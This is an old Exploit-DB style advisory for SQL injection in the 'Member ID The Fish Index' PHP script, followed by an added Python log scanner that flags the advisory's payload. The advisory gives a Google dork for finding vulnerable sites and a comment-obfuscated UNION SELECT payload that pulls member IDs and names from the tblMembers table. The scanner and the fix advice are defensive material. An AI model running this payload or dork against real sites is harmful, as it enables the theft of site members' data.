Member ID The Fish Index PHP - SQL Injection

EDB-ID: 12850
CVE: N/A
Author: v4lc0m87
Type: webapps
Platform: PHP
Date: 2010-06-03

*************************************************************************
 ,                              
 |       ,---. ,   . |---. ,---. ,---.   ,---. ,---. ,---. ,   .   ,
 |  ---  |     |   | |   | |---' |       |     |     |---' |   |   |
 |       `---' `---| `---' `---' `       `---' `     `---' `---`---
 `             `---'                                                  
*************************************************************************
[V] Member ID The Fish Index PHP SQL Injection Vulnerability
 
            --==[ Author ]==--

[+] Author  : v4lc0m87
[+] Contact : valcom87[at]gmail[dot]com
[+] Group   : INDONESIAN CYBER
[+] Site    : http://indonesian-cyber.org/
[+] Date    : June, 3-2010 [INDONESIA]
 
*************************************************************************
            --==[ Details ]==--
 
[+] Vulnerable  : SQL Injection
[+] Google Dork : inurl:index.php?myPlantId=
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
[-] Exploit :
[+] 9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers--
 
[-] Remote SQLi p0c :
[+] http://127.0.0.1/[path]/index.php?myPlantId=9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers--
     
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
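
A log check for the request shape in the PoC above, as an added example that is not part of the original advisory: it URL-decodes `myPlantId`, treats `/**/` comments as whitespace, and flags any value that is not a plain integer. The log lines, the `/shop/` path and the client addresses are constructed for illustration; the advisory gives only `[path]`.

```python
import re
from urllib.parse import urlsplit, parse_qs

PARAM = "myPlantId"  # parameter named in the advisory
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b")

# Constructed access-log lines (common log format, documentation IP range).
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Jun/2010:10:00:01 +0700] "GET /shop/index.php?myPlantId=9 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [03/Jun/2010:10:00:05 +0700] "GET /shop/index.php?myPlantId=9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers-- HTTP/1.1" 200 6033',
    '198.51.100.7 - - [03/Jun/2010:10:00:09 +0700] "GET /shop/index.php?page=about HTTP/1.1" 200 2048',
    '198.51.100.12 - - [03/Jun/2010:10:00:12 +0700] "GET /shop/index.php?myPlantId=12%27 HTTP/1.1" 500 310',
]

def classify(value):
    """Return 'ok', 'union-select' or 'non-numeric' for a decoded parameter value."""
    if re.fullmatch(r"[0-9]+", value):
        return "ok"  # a record ID should be digits only
    # Inline comments stand in for whitespace in the PoC; turn them back into spaces.
    normalized = " ".join(SQL_COMMENT.sub(" ", value).lower().split())
    if UNION_SELECT.search(normalized):
        return "union-select"
    return "non-numeric"

def scan(lines):
    """Return (client_ip, verdict, decoded_value) for every suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs percent-decodes values, so %28/%29 become parentheses.
        for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
            verdict = classify(value)
            if verdict != "ok":
                findings.append((line.split()[0], verdict, value))
    return findings

if __name__ == "__main__":
    for ip, verdict, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{verdict}\t{value}")
```

The `non-numeric` verdict matters as much as the UNION match: the parameter is an integer ID, so rejecting anything else at the application (an integer cast or a bound parameter) closes the hole regardless of how the payload is obfuscated.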
 
INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | IDC
 
[V] Greetz :
SaruKusai, MarilynMesum (hope you two become a true couple, lol)
Team m0n0n, the camera hogs (clase_1214n, c4uR, astroboyyy, aldy182, vhesckot_1601)
The naughty old boys (mbah l4mpor, awchoy)
flyff666 cruz3N petimati spykit v3n0m uzanc
kokoh wisdom (why do you keep venting on FB, koh :p)
blue screen, skutengboy (you two make a well-matched couple too, hahaha)
[K]urabu[S]aru [RnR] cO2 community
and y0u !!